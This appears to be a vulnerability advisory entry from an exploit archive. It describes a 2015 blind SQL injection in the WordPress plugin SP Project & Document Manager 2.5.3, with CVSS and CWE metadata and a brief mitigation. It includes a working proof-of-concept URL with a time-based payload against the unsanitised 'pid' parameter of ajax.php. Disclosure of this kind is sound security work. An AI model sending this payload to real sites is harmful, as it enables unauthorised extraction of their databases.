vendor:
SP Project & Document Manager
by:
catsecurity
7.5
CVSS
HIGH
Blind SQL Injection
89
CWE
Product Name: SP Project & Document Manager
Affected Version From: 2.5.3 and previous version
Affected Version To: 2.5.2003
Patch Exists: YES
Related CWE: N/A
CPE: 2.5.2003
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: Chrome (It's PHP Application)
2015
WordPress SP Project & Document Manager 2.5.3 Blind SQL Injection
This vulnerability did not process integer parameters. Unauthorized users can attact the webstites that use this plugin. Vulnerability code in the thumbnails() function which exists in the [ /wp-content/plugins/sp-client-document-manager/ajax.php ]. 'pid' variable is not sanitized. POC: /wordpress/wp-content/plugins/sp-client-document-manager/ajax.php?function=thumbnails&pid=[SQLi] example: /wordpress/wp-content/plugins/sp-client-document-manager/ajax.php?function=thumbnails&pid=if(substr(database(),1,1)=0x61,sleep(5),1)
Mitigation:
This vulnerable parameters must trance to integer.